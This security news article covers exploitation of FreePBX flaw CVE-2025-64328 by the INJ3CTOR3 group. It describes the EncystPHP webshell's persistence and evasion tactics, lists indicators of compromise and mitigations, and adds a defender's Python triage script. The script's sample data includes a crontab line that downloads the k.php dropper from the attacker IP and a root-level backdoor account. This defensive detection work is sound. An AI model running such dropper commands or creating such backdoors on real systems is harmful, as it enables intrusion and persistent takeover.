Critical FreePBX Vulnerability CVE-2025-64328 Exploited by INJ3CTOR3 Group, EncystPHP Webshell Used for System Takeover

Critical FreePBX Vulnerability Exploited: EncystPHP Webshell Grants Attackers Full System Control

In early December 2025, cybersecurity researchers identified a sophisticated attack campaign targeting FreePBX systems, a widely used open-source VoIP PBX platform. The attackers exploited a critical vulnerability, designated as CVE-2025-64328, to deploy a persistent webshell known as EncystPHP, granting them complete administrative control over compromised systems.

Understanding CVE-2025-64328

CVE-2025-64328 is a post-authentication command injection flaw located within the Endpoint Manager module’s administrative interface, specifically in the `check_ssh_connect()` function of the Filestore component. This vulnerability allows authenticated users to execute arbitrary shell commands as the ‘asterisk’ user, providing a gateway for deeper system compromise.

Attribution to INJ3CTOR3

The malicious activities have been attributed to INJ3CTOR3, a financially motivated hacker group first identified in 2020. Initially, they targeted FreePBX systems by exploiting CVE-2019-19006. In 2022, the group shifted focus to Elastix systems, leveraging CVE-2021-45461. Their consistent pattern of targeting VoIP infrastructures underscores a strategic intent to monetize unauthorized access through methods like toll fraud and unauthorized call generation.

Exploitation Methodology

The attack campaign commenced with threat actors originating from Brazil, targeting environments managed by an Indian technology company specializing in cloud solutions and communication services. The attackers downloaded the EncystPHP dropper from the IP address 45[.]234[.]176[.]202, associated with the domain crm[.]razatelefonia[.]pro—a site masquerading as a VoIP management system. Accessing the new/ route on this domain redirected requests to another dropper named k.php.

Capabilities of EncystPHP Webshell

EncystPHP is a sophisticated webshell with advanced capabilities, including:

– Remote Command Execution: Allows attackers to execute arbitrary commands on the compromised system.

– Multi-Stage Persistence Mechanisms: Ensures long-term access through various persistence strategies.

– Evasion Techniques: Modifies file permissions of legitimate FreePBX components to prevent detection and removes competing webshells from the system.

Establishing Persistence

Upon deployment, EncystPHP establishes persistence by:

– Creating a Root-Level User Account: Adds a user named newfpbx with hardcoded credentials.

– Resetting User Account Passwords: Resets multiple user account passwords to a single value.

– Injecting SSH Public Keys: Maintains backdoor access by injecting SSH keys.

– Modifying System Configurations: Ensures SSH port 22 remains open for continuous remote access.

Camouflaging Malicious Activity

EncystPHP masquerades as a legitimate FreePBX file named ajax.php, blending seamlessly into the application structure to evade casual inspection. It employs MD5-hashed authentication, comparing plaintext passwords entered via the web interface against hard-coded hash values embedded in the code.

Interactive Interface: Ask Master

Once authenticated, the webshell exposes an interactive interface titled Ask Master, which includes predefined operational commands for:

– File System Enumeration: Lists files and directories.

– Process Inspection: Monitors running processes.

– Querying Active Asterisk Channels: Retrieves information on active communication channels.

– Listing SIP Peers: Displays Session Initiation Protocol peers.

– Retrieving Configuration Files: Accesses FreePBX and Elastix configuration files.

By leveraging elevated privileges within the Elastix and FreePBX administrative contexts, the webshell enables arbitrary command execution and initiates outbound call activity through the compromised PBX environment.

Multi-Stage Persistence Architecture

The attack implements a four-stage persistence mechanism to ensure long-term access:

1. Initial Persistence: Established through crontab entries that download the secondary dropper k.php every minute.

2. Subsequent Stages: Deploy additional droppers across multiple directories under /var/www/html/, including digium_phones/, rest_phones/, phones/, and freepbxphones/, creating redundant access points that increase resilience against removal attempts.

3. Timestamp Forgery: The malware forges timestamps to match legitimate files, making detection more challenging.

4. Log Tampering: EncystPHP tampers with log files and disables error reporting to hinder forensic analysis and detection efforts.

Indicators of Compromise (IoCs)

Organizations should be vigilant for the following IoCs:

– URLs:
  – hxxp://45[.]234[.]176[.]202/new/c
  – hxxp://45[.]234[.]176[.]202/new/k.php

– Domain:
  – crm[.]razatelefonia[.]pro

– IP Addresses:
  – 45[.]234[.]176[.]202
  – 187[.]108[.]1[.]130

– SHA256 Hash:
  – 71d94479d58c32d5618ca1e2329d8fa62f930e0612eb108ba3298441c6ba0302

Mitigation Strategies

To protect against this threat, organizations should:

1. Apply Patches Promptly: Ensure all FreePBX systems are updated to the latest versions that address CVE-2025-64328.

2. Restrict Access: Limit access to the FreePBX administrative interface to trusted networks only.

3. Monitor for IoCs: Regularly scan systems for the indicators of compromise listed above.

4. Implement Strong Authentication: Enforce robust authentication mechanisms to prevent unauthorized access.

5. Conduct Regular Security Audits: Perform periodic security assessments to identify and remediate vulnerabilities.
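A defender-side triage script covering the persistence artifacts described under Establishing Persistence and Multi-Stage Persistence Architecture (the every-minute k.php crontab entry, the newfpbx account, droppers under /var/www/html/) together with the "Monitor for IoCs" step. This is an added example, not code from the original report or from the FreePBX project; the crontab, passwd and path inputs below are constructed samples.

```python
import hashlib
import re

# Indicators from the report, with the defanged [.] notation written out so they can be matched.
IOC_HOST = "45.234.176.202"
IOC_DOMAIN = "crm.razatelefonia.pro"
IOC_SHA256 = "71d94479d58c32d5618ca1e2329d8fa62f930e0612eb108ba3298441c6ba0302"
DROPPER_DIRS = ("digium_phones", "rest_phones", "phones", "freepbxphones")
BACKDOOR_USER = "newfpbx"

def check_crontab(lines):
    """Flag non-comment cron entries that fetch k.php or contact the IoC host/domain."""
    return [l.strip() for l in lines
            if not l.lstrip().startswith("#")
            and ("k.php" in l or IOC_HOST in l or IOC_DOMAIN in l)]

def check_passwd(lines):
    """Return the backdoor account name and any UID-0 account that is not root."""
    hits = []
    for line in lines:
        parts = line.strip().split(":")
        if len(parts) < 3:
            continue
        name, uid = parts[0], parts[2]
        if name == BACKDOOR_USER or (uid == "0" and name != "root"):
            hits.append(name)
    return hits

def check_webroot(paths):
    """PHP files directly under the webroot directories the campaign drops into (a review list)."""
    pat = re.compile(r"^/var/www/html/(" + "|".join(DROPPER_DIRS) + r")/[^/]+\.php$")
    return [p for p in paths if pat.match(p)]

def file_matches_ioc(data):
    """True if the file bytes hash to the SHA256 published for the campaign."""
    return hashlib.sha256(data).hexdigest() == IOC_SHA256

# Constructed sample inputs (not real system data) mimicking the artifacts the report describes.
SAMPLE_CRONTAB = ["# m h dom mon dow command",
                  "0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf",
                  "* * * * * curl -s http://45.234.176.202/new/k.php -o /tmp/k.php"]
SAMPLE_PASSWD = ["root:x:0:0:root:/root:/bin/bash",
                 "asterisk:x:1000:1000::/var/lib/asterisk:/sbin/nologin",
                 "newfpbx:x:0:0::/root:/bin/bash"]  # constructed: root-level backdoor account
SAMPLE_PATHS = ["/var/www/html/admin/ajax.php", "/var/www/html/digium_phones/ajax.php",
                "/var/www/html/rest_phones/k.php"]

def run_checks():
    return {"cron": check_crontab(SAMPLE_CRONTAB), "users": check_passwd(SAMPLE_PASSWD),
            "web": check_webroot(SAMPLE_PATHS)}
```

On a live system the inputs would come from /etc/crontab plus the root and asterisk user crontabs, /etc/passwd, and a file listing of the webroot; webroot hits are a review list rather than a verdict, since FreePBX has its own legitimate ajax.php and the webshell is named to blend in with it.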

Conclusion

The exploitation of CVE-2025-64328 by the INJ3CTOR3 group highlights the critical need for vigilance in securing VoIP infrastructures. By understanding the attack vectors and implementing robust security measures, organizations can mitigate the risks associated with such sophisticated threats.